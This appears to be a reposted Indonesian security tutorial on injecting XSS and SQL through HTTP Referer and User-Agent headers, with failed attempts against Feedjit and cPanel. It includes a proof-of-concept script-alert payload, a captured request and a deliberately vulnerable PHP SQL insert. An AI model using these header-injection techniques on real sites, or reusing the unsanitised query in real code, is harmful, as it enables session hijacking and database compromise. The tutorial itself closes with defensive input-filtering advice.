Failed Attack on Feedjit
Lho kalau begitu kan serangan ini tidak ada gunanya karena harus mengubah header referer dulu, jadi cuma bisa xss di browser sendiri dong? Bagaimana caranya agar serangan jenis ini bisa menyerang orang lain? Agar serangan ini bisa berakibat ke orang lain, maka web application yang diserang haruslah menyimpan header referer pengunjungnya kemudian menampilkannya di halaman webnya.
feedjit widgetfeedjit widget
Saya belum menemukan contoh web yang menyimpan header referer pengunjung dan menampilkannya kembali dalam bentuk list. Namun agar bisa terbayang, saya gunakan contoh hipotetis saja Feedjit.com. Ingat, Feedjit tidak vulnerable terhadap serangan ini, jadi saya akan berikan contoh serangan xss saya yang gagal di feedjit sehingga anda bisa terbayang bagaimana akibatnya bila serangan itu berhasil.
Ada 3 hal penting yang ditampikan feedjit dalam widgetnya, yaitu:
  1. Daerah asal, yang ditunjukkan dengan bendera negara dan kotanya.
  2. Dari mana asal request berasa yang ditunjukkan dengan kalimat “arrived from”.
  3. Halaman apa yang sedang dibaca.
Dari ketiga elemen tersebut yang bisa kita kendalikan adalah asal request dan apa yang sedang dibaca. Sedangkan daerah asal ditentukan oleh IP address yang tidak bisa kita kendalikan. Kita mungkin bisa membuat kita tampak dari negara lain dengan proxy, tapi tetap saja yang muncul adalah bendera dan kota yang sudah fixed.
Sekarang saya coba untuk menginjeksi tag html melalui header referer dengan harapan akan muncul di widget tersebut. Pertama saya ubah dulu header referer dari addon Modify Header, kemudian saya klik salah astu artikel di ilmuhacking.com. Request yang terjadi yang disniff dengan Live http header adalah:
1
2
3
4
5
6
7
8
9
10
11
12
13
http://feedjit.com/router/?w=trafficList&ign=0&wn=1&cen=1&nv=1&fl=0&vid=new&rn=0&lg=1&u=http://www.ilmuhacking.com/web-security/menjebol-captcha-dengan-ocr/&r=http://<b>cobain</b>&t=Menjebol Captcha dengan OCR | Web Security | IlmuHacking.com&sw=1280&sh=960&fjv=2&rand=769547649
 
GET /router/?w=trafficList&ign=0&wn=1&cen=1&nv=1&fl=0&vid=new&rn=0&lg=1&u=http%3A%2F%2Fwww.ilmuhacking.com%2Fweb-security%2Fmenjebol-captcha-dengan-ocr%2F&r=http%3A%2F%2F%3Cb%3Ecobain%3C%2Fb%3E&t=Menjebol%20Captcha%20dengan%20OCR%20%7C%20Web%20Security%20%7C%20IlmuHacking.com&sw=1280&sh=960&fjv=2&rand=769547649 HTTP/1.1
Host: feedjit.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.5) Gecko/2008120122 Firefox/3.0.5
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Proxy-Connection: keep-alive
Referer: http://<b>cobain</b>
Cookie: fjdt100=1232528992
Ketika kita membuka halaman yang mengandung widget feedjit, maka javascript yang ada akan mengirimkan request ke server feedjit.com yang berisi referer, judul artikel dan url artikel yang dibaca. Perhatikan URL yang direquest, 3 variabel yang mengirimkan data tersebut adalah:
u=http://www.ilmuhacking.com/web-security/menjebol-captcha-dengan-ocr/
r=http://<b>cobain</b>
t=Menjebol Captcha dengan OCR | Web Security | IlmuHacking.com
Parameter get u adalah URL untuk artikel yang saya baca, parameter r adalah referer, dan t adalah judul artikel. Saya mencoba menginjeksi tag html <b>cobain</b> , mari kita lihat apa yang nampak pada widget feedjit.
widget urlwidget url
xss failedxss failed
Ternyata tag html saya gagal diinjeksi karena sudah di-escape dengan benar. Seharusnya teks cobain dicetak tebal. Tapi ternyata <b>cobain</b> berubah menjadi bcobain, artinya injeksi gagal total.
if succeededif succeeded
Bayangkan bila injeksi ini berhasil. Maka halaman web yang mengandung widget ini bisa diinjeksi dengan script untuk mencuri cookie. Bila kebetulan admin sedang login, kemudian mengecek blognya, tentu cookie berisi sessionid dia akan terancam. Mari kita coba seandainya injection berhasil dengan mengubah htmlnya dengan addon Firebug. Tampilannya akan seperti pada gambar di samping. Itu baru tag bold bagaimana bila tag script? Tenu akibatnya akan fatal karena session bisa di-hijack. Beruntung untuk wordpress karena cookie session id di-set hanya dikirim bila path URL /wp-admin/ maka cookie tersebut tidak akan terkirim ketika admin sedang membaca artikel dalam keadaan login. Namun bila cookienya diset path / maka cookie dipastikan akan terkirim bila admin membaca artikel ketika sedang login.
Header User-Agent
Header ini menunjukkan jenis browser yang dipakai. Dalam user agent biasanya akan terlihat sistem operasinya juga. Hedaer ini biasanya sudah ditentukan oleh browser, namun dengan addon User Agent Switcher saya bisa mengubahnya menjadi teks apapun, termasuk menginjeksi script atau tag html.
Sebagai contoh sederhana bisa dicoba www.ipmonkey.com. Web ini menampilkan user agent dan ip address. Bila saya ganti user agent browser saya menjadi <script>alert(‘xssed’);</script> maka script saya akan dieksekusi browser seperti pada gambar di bawah ini:
xssed user agentxssed user agent
Seperti pada header referer, bila hanya serangan model begini tidak ada gunanya karena cuma bisa menyerang diri sendiri. Agar bisa menyerang orang lain, maka web application yang diserang harus menyimpan apa yang saya injeksi dan kemudian ditampilkan di webnya agar bisa dilihat orang lain. Sayangnya saya juga belum menemukan contoh web yang seperti itu. Contoh jenis web application yang menampilkan user-agent dalam webnya adalah cpanel. Namun ingat, cpanel tidak vulnerable terhadap serangan ini. Saya hanya memberi contoh hipotetis saja untuk ilustrasi saja.
Cpanel ada menu untuk melihat latest visitor yang menunjukkan ip address, url yang diakses, referer dan user agent. Saya akan coba menyisipkan script/tag html melalui user agent dan berharap cpanel menampilkannya tanpa filter. Hasilnya seperti pada gambar di bawah ini:
failed cpanel xss attackfailed cpanel xss attack
Terlihat bahwa tag script yang saya injeksikan telah diubah menjadi entity html &lt; dan &gt; sehingga tidak dieksekusi browser. Jadi serangan xss saya gagal total juga, hehe. Sebagai ilustrasi bila saya injeksikan tag <b>TEST</b><script>alert(‘xssed’);</script> dan bila tidak difilter, maka hasilnya akan tampak seperti gambar berikut:
header8
Halaman itu adalah salah satu halaman dalam cpanel, jadi hanya yang sudah login di cpanel yang bisa melihat latest visitor itu. Jadi bila script saya dieksekusi, maka saya bisa mengambil alih session cpanel orang itu. Untungnya (atau sayangnya) cpanel tidak vulnerable terhadap serangan ini.
SQL Injection via Header
Oke dari tadi saya hanya bicara tentang XSS, bagaimana dengan sql injection? Mungkinkah serangan sql injection dilakukan dari header referer dan user agent? Jawaban saya sangat MUNGKIN sekali. Karena tidak adanya contoh yang vulnerable terhadap sql injection dengan header referer/user-agent saya hanya menjelaskan konsepnya saja.
Bayangkan ada web application yang mencatat log visitornya dalam tabel bernama visitor. Field tabel visitor adalah id, ipaddress,useragent, referer dan time semuanya bertipe varchar kecuali id bertipe int dan time yang bertipe timestamp. Setiap ada pengunjung baru, php akan meng-insert ke tabel visitor dengan sql berikut:
$sql = "insert into visitor (ipaddress,useragent,referer) values('$ipaddress','$useragent','$referer')";
Dari ketiga variabel itu yang bisa dikendalikan hanyalah user agent dan referer sebab ip address tidak bisa kita ubah seenaknya. Kalau saya injeksikan code sql yang diawali dengan karakter single quote (‘) melalui header user agent atau referer, tentu akan malicious code sql saya akan berhasil.
Kesimpulan
Saya sudah tunjukkan cara untuk menginjeksikan malicious code melalui header http. Ada banyak jalan yang bisa dipakai untuk menyerang web application. Hacker selalu mencoba menginjeksikan malicious data/code melalui semua pintu yang tersedia. Aplikasi yang prosesnya bergantung dari masukan klien bisa jadi sasaran tembak hacker.
Agar selamat dari serangan hacker, semua input harus benar-benar dijaga. Jangan percaya begitu saja dengan input dari klien. Terapkan whitelist filter, semua masukan yang diluar daftar yang diperbolehkan agar direject.
Source: Ilmuhacking . com / Arif W.

- Copyright © SHARING OF KNOWLEDGE - Date A Live - Powered by Blogger - Designed by Johanes Djogan -